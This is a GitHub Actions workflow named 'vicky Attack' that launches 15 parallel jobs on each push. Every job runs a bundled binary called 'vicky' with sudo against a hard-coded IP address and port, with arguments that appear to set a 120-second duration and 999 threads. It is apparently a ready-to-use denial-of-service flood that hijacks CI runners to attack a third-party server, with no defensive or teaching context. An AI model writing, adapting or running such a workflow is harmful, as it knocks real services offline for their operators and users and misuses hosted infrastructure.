name: vicky Attack
on: [push]

jobs:
  vicky:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,
            11,12,13,14,15]
    steps:
    - uses: actions/checkout@v3
    - run: chmod +x vicky
    - run: sudo ./vicky 20.198.111.86 10004 120 999
